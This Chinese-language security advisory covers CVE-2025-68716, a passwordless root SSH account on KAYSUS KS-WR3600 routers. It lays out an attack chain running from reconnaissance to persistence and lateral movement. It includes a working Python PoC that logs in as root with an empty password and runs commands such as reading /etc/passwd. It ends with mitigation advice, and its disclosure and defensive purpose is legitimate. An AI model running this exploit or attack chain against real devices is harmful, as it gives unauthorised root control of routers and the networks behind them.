CVE-2025-68716 KAYSUS KS-WR3600路由器root账户无密码导致未授权访问

漏洞信息

漏洞编号

CVE-2025-68716

漏洞类型

默认凭证/未授权访问

CVSS评分

8.4 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

KAYSUS KS-WR3600路由器（固件1.0.5.9.1）

漏洞概述

CVE-2025-68716是一个严重的安全漏洞，影响KAYSUS KS-WR3600系列路由器。该漏洞存在于固件版本1.0.5.9.1中，核心问题是SSH服务在LAN接口上默认启用，且root账户未设置任何密码。更为严重的是，设备的管理员无法通过命令行界面或Web图形界面禁用SSH服务或强制实施身份验证机制。这一设计缺陷使得任何能够接入本地网络的攻击者都可以毫无障碍地获得设备的root shell访问权限，从而完全控制路由器设备。攻击者一旦获得root权限，就可以执行任意系统命令，修改路由表，嗅探网络流量，植入后门程序，甚至将攻击范围扩展到连接该路由器的所有设备。该漏洞的危险性在于其利用门槛极低，无需高级黑客技术，任何具备基础网络知识的攻击者都可以轻松利用此漏洞。鉴于CVSS评分高达8.4分，且攻击向量为本地网络（AV:L），在局域网环境下的危害性极大。

技术细节

该漏洞的技术根源在于KAYSUS KS-WR3600路由器固件1.0.5.9.1版本的系统配置存在严重缺陷。具体而言，SSH守护进程（sshd）被配置为在LAN接口上自动启动，且系统默认创建了root账户但未设置密码策略。设备的Web管理界面和CLI管理工具均未提供禁用SSH服务的功能选项，同时也没有强制要求用户设置root密码的机制。从系统架构角度看，该路由器运行的是嵌入式Linux系统，SSH服务以root权限运行，监听在LAN接口的22端口。当攻击者连接到路由器的LAN网络后，可以直接使用SSH客户端尝试无密码登录：ssh root@<路由器IP>。由于系统未配置PAM（可插拔认证模块）的密码验证要求，SSH服务直接允许空密码的root用户登录。成功登录后，攻击者获得的是一个拥有完整系统权限的交互式shell，可以执行任意命令，包括查看/etc/shadow文件、修改系统配置、添加新用户、安装恶意软件等操作。此外，攻击者还可以利用获得的root权限进一步进行横向移动，攻击内网中的其他设备。

攻击链分析

STEP 1

步骤1：网络侦察

攻击者接入目标路由器的LAN网络，使用nmap等工具扫描内网，发现运行SSH服务（端口22）的KAYSUS KS-WR3600路由器

STEP 2

步骤2：识别漏洞设备

通过横幅抓取或HTTP管理页面确认设备型号和固件版本为1.0.5.9.1

STEP 3

步骤3：利用SSH空密码登录

使用SSH客户端直接以root用户名和空密码尝试登录，由于固件未实施密码验证，登录成功

STEP 4

步骤4：获得root shell

成功登录后获得完整的root权限shell，可以执行任意系统命令

STEP 5

步骤5：持久化控制

攻击者可以添加后门账户、修改启动脚本、安装恶意软件，确保持久化控制

STEP 6

步骤6：横向移动

利用路由器作为跳板，嗅探内网流量，攻击其他联网设备，扩大攻击范围

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-68716 PoC - KAYSUS KS-WR3600 Router Root Access
# Affected: KAYSUS KS-WR3600 with firmware 1.0.5.9.1
# Vulnerability: SSH root account with no password enabled by default

import socket
import sys
from paramiko import SSHClient, AutoAddPolicy

def check_ssh_port(ip, port=22, timeout=5):
    """Check if SSH port is open on target"""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        result = sock.connect_ex((ip, port))
        sock.close()
        return result == 0
    except:
        return False

def exploit_cve_2025_68716(target_ip):
    """Exploit CVE-2025-68716: Login to KAYSUS router via SSH with no password"""
    print(f"[*] Target: {target_ip}")
    print(f"[*] Testing SSH service on port 22...")
    
    if not check_ssh_port(target_ip):
        print("[-] SSH port is not accessible")
        return False
    
    print("[+] SSH port is open, attempting root login with no password...")
    
    client = SSHClient()
    client.set_missing_host_key_policy(AutoAddPolicy())
    
    try:
        # CVE-2025-68716: Root account has no password
        client.connect(
            hostname=target_ip,
            port=22,
            username='root',
            password='',
            timeout=10,
            allow_agent=False,
            look_for_keys=False
        )
        print("[+] SUCCESS: Logged in as root with no password!")
        
        # Execute commands to verify root access
        stdin, stdout, stderr = client.exec_command('whoami; uname -a; cat /etc/passwd | grep root')
        print("\n[+] Command output:")
        print(stdout.read().decode())
        
        # List network interfaces
        stdin, stdout, stderr = client.exec_command('ip addr show')
        print("\n[+] Network interfaces:")
        print(stdout.read().decode())
        
        client.close()
        return True
        
    except Exception as e:
        print(f"[-] Login failed: {str(e)}")
        return False

def main():
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-68716.py <target_ip>")
        print("Example: python cve-2025-68716.py 192.168.1.1")
        sys.exit(1)
    
    target_ip = sys.argv[1]
    exploit_cve_2025_68716(target_ip)

if __name__ == "__main__":
    main()

影响范围

KAYSUS KS-WR3600 固件 1.0.5.9.1（所有已知受影响版本）

防御指南

临时缓解措施

由于该漏洞存在于设备固件层面，且管理员无法通过正常途径禁用SSH服务，临时缓解措施包括：1）使用路由器防火墙规则阻止所有来自非信任设备的SSH访问（如果功能可用）；2）在网络边界部署严格的访问控制列表（ACL），限制对路由器管理接口的访问；3）监控网络流量，关注异常的SSH连接行为；4）考虑更换为已修复该漏洞的路由器型号或等待厂商发布安全更新；5）如果业务允许，可以考虑在路由器前部署额外的认证网关来保护内网设备安全。